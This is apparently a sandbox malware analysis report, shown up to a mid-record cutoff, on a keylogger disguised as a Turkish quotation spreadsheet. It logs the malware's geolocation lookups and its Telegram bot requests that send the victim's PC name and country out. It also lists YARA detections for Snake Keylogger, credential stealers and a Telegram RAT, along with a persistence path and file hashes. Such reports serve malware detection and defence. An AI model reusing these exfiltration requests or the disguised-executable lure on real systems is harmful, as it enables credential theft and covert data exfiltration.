                                                2024-10-08 10:45:24 UTC | 344 | IN | HTTP/1.1 404 Not Found
                                                Server: nginx/1.18.0
                                                Date: Tue, 08 Oct 2024 10:45:24 GMT
                                                Content-Type: application/json
                                                Content-Length: 55
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                2024-10-08 10:45:24 UTC | 55 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                18 | 192.168.2.5 | 49780 | 188.114.97.3 | 443 | 3772 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-10-08 10:45:24 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-10-08 10:45:25 UTC | 712 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:24 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 50656
                                                Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ePRtWnTH8Z7tmPolbHv02fYNINqBxFkUxQ2CWorqnFWzqKMHtjdeuFC57FL7S1PL9lrC%2F40SGVlG4JigioHOhYLk%2BT%2Bk0o8cCQKPjQ8%2FaKX9SqcwxTre%2Fd8uRqAIodU0%2BzRDBUHk"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8cf58a8cac7242e4-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-10-08 10:45:25 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-10-08 10:45:25 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                19 | 192.168.2.5 | 49785 | 188.114.97.3 | 443 | 5480 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-10-08 10:45:25 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                2024-10-08 10:45:25 UTC | 672 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:25 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 50657
                                                Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BYZacr3GOOZnQ4DrmSRa4Dbr1AntiL2zpM1qaGtKtQEyLNF8kFDMA2TwZS94uHKU9P71p74QJxjQ3uLq9RQMJ5uICn%2BvAPVIhcGHQC0m9wUPOeJf6VceU3yWDaNraIwK0rwbwkzl"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8cf58a937fa4437a-EWR
                                                2024-10-08 10:45:25 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-10-08 10:45:25 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                20 | 192.168.2.5 | 49794 | 188.114.97.3 | 443 | 3772 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-10-08 10:45:26 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-10-08 10:45:27 UTC | 672 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:26 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 50658
                                                Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5pMrUbM5U2ezIBv0S7qVStsZLvmyzBuoHyEdawGOodqM4l4skZU6tN7sdlhLjitWvqi4k4BoEP%2FUSNWe975tymxn6qRFnWFkmmwAMvBbsh8JIhYRVFGdIU0ZdAUwOad4MM2tq19e"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8cf58a9b88efc3f5-EWR
                                                2024-10-08 10:45:27 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-10-08 10:45:27 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                21 | 192.168.2.5 | 49795 | 188.114.97.3 | 443 | 5480 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-10-08 10:45:26 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-10-08 10:45:27 UTC | 678 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:26 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 50658
                                                Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b41h9aA4nUCIp1pfmZc8d9mAycjhwIN73tiC8bO7oB710LllYVjQnX%2FCcILgtynxvwXyMJQcEe5QZqn0icvWPuWUQpXjXONsYvOaQfos2qlC%2FcUz2zyQBLkP3LAw%2BcIKeT0%2BiFcZ"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8cf58a9baa0143b0-EWR
                                                2024-10-08 10:45:27 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-10-08 10:45:27 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                22 | 192.168.2.5 | 49803 | 188.114.97.3 | 443 | 3772 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-10-08 10:45:28 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-10-08 10:45:28 UTC | 706 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:28 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 50660
                                                Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fBu3ErW0k%2Bixx3Dug8iQm4%2FrGXby%2FgAzeqEhVlzrAwj4eN99jzV0ZPzuQMSElmgk5MPaIqzxb5T4JXVIuxODQ2ORlTye21ob6WQjE57ZPe6PiyNI8JJHHAvTUhvDpGlfnohxx77M"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8cf58aa34ff67d24-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-10-08 10:45:28 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-10-08 10:45:28 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                23 | 192.168.2.5 | 49804 | 188.114.97.3 | 443 | 5480 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-10-08 10:45:28 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-10-08 10:45:28 UTC | 682 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:28 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 50660
                                                Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1qtDBjU5N%2FmjggXQKWDm3VwUDYZIQhn74%2Bb0ByjIw5RS%2F6X1GDiYAimF4NzyEi97CIx6G9TiaTFmkPfyfzR3Fp7lxQUzmlgxFpDz6zR29M6%2FNb%2BvXyefUt%2FWTB5VDrSiSXNoB8aJ"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8cf58aa388718c53-EWR
                                                2024-10-08 10:45:28 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-10-08 10:45:28 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                24 | 192.168.2.5 | 49811 | 149.154.167.220 | 443 | 5480 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-10-08 10:45:28 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965969%0D%0ADate%20and%20Time:%2008/10/2024%20/%2022:25:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965969%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                Host: api.telegram.org
                                                Connection: Keep-Alive
                                                2024-10-08 10:45:29 UTC | 344 | IN | HTTP/1.1 404 Not Found
                                                Server: nginx/1.18.0
                                                Date: Tue, 08 Oct 2024 10:45:29 GMT
                                                Content-Type: application/json
                                                Content-Length: 55
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                2024-10-08 10:45:29 UTC | 55 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                25 | 192.168.2.5 | 49817 | 188.114.97.3 | 443 | 3772 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-10-08 10:45:29 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-10-08 10:45:29 UTC | 682 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:29 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 50661
                                                Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KJWf%2B5WsRsix5nyMVRBgR%2Fe1wyUkYNi3G7j4cRLrnku8fkzbvue%2BGBlyUwZKnka06zt2JP07Xi%2FU6KY%2BanjcgYoRJ5zA4aygtYhvrYaayTYw9%2BNphni13DS7P0z4DcW6obbXuwPm"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8cf58aaadd2bc33d-EWR
                                                2024-10-08 10:45:29 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-10-08 10:45:29 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                26 | 192.168.2.5 | 49826 | 188.114.97.3 | 443 | 3772 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-10-08 10:45:30 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-10-08 10:45:30 UTC | 676 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:30 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 50662
                                                Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CtoZLhf2FLdozu45SNpVvlrs2q7ib1e3eG79woDrbx0upi2q7pDnvbQNfINcajoT64I70MCPCTNHSkrVcXQQs5VmZdrGOnZwIGElX1FpMBhHhgqTjgdfU%2BOMe%2FVblY%2B0aPNlGtRn"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8cf58ab25dd243b0-EWR
                                                2024-10-08 10:45:30 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-10-08 10:45:30 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                27 | 192.168.2.5 | 49836 | 188.114.97.3 | 443 | 3772 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-10-08 10:45:32 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-10-08 10:45:32 UTC | 678 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:32 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 50664
                                                Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a4C6nf2GTHbf2O0lelbqBb%2BnOpdt1iC57kv5OzHbeV2B8JreHZ3YaeALkE89V9Ps98X9mFwpEMep%2FrtIuGcwuJM70AXpuJr%2BaAbCXqYLtZhLASDdKO1v9m0AM4hzkfkH2Er35N%2BM"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8cf58abbfcff4396-EWR
                                                2024-10-08 10:45:32 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-10-08 10:45:32 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                28 | 192.168.2.5 | 49848 | 188.114.97.3 | 443 | 3772 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-10-08 10:45:33 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-10-08 10:45:33 UTC | 678 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:33 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 50665
                                                Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hsP5ButQ1DgHae95fylIwDedhlWd%2FH6Z%2F3cVwrG7ZHaciF4DLnX8qLQ7eEomPj7Jj%2FRLGg7ei0ULpLgXWKRUkPlQsGNbYioD8f59kGlhC%2B01YBcrjvnlspD65nlnvpJyaryakqaw"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8cf58ac35b520c95-EWR
                                                2024-10-08 10:45:33 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-10-08 10:45:33 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                29 | 192.168.2.5 | 49853 | 149.154.167.220 | 443 | 3772 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-10-08 10:45:34 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965969%0D%0ADate%20and%20Time:%2008/10/2024%20/%2019:29:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965969%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                Host: api.telegram.org
                                                Connection: Keep-Alive
                                                2024-10-08 10:45:34 UTC | 344 | IN | HTTP/1.1 404 Not Found
                                                Server: nginx/1.18.0
                                                Date: Tue, 08 Oct 2024 10:45:34 GMT
                                                Content-Type: application/json
                                                Content-Length: 55
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                2024-10-08 10:45:34 UTC | 55 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                Target ID:0
                                                Start time:06:44:55
                                                Start date:08/10/2024
                                                Path:C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe"
                                                Imagebase:0xc50000
                                                File size:2'394'624 bytes
                                                MD5 hash:1E9DC5041BF503CB63397E6A8F0BAE9A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2062230360.0000000005A40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2043823101.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2043823101.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:true

                                                Target ID:2
                                                Start time:06:44:56
                                                Start date:08/10/2024
                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                Imagebase:0x710000
                                                File size:42'064 bytes
                                                MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000002.00000002.4490634067.0000000000431000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4490634067.0000000000431000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4490634067.000000000043A000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4496377708.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4496377708.0000000002B89000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:moderate
                                                Has exited:false

                                                Target ID:3
                                                Start time:06:45:07
                                                Start date:08/10/2024
                                                Path:C:\Users\user\AppData\Roaming\Tojeiuai.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Roaming\Tojeiuai.exe"
                                                Imagebase:0xc80000
                                                File size:2'394'624 bytes
                                                MD5 hash:1E9DC5041BF503CB63397E6A8F0BAE9A
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2175629104.00000000043E7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.2175629104.00000000043E7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.2175629104.00000000043E7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.2175629104.00000000043E7000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2164548814.0000000003796000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2175629104.000000000446B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.2175629104.000000000446B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.2175629104.000000000446B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.2175629104.000000000446B000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.2164548814.0000000003391000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Antivirus matches:
                                                • Detection: 100%, Joe Sandbox ML
                                                • Detection: 34%, ReversingLabs
                                                • Detection: 42%, Virustotal, Browse
                                                Reputation:low
                                                Has exited:true

                                                Target ID:4
                                                Start time:06:45:08
                                                Start date:08/10/2024
                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Wow64 process (32bit):true
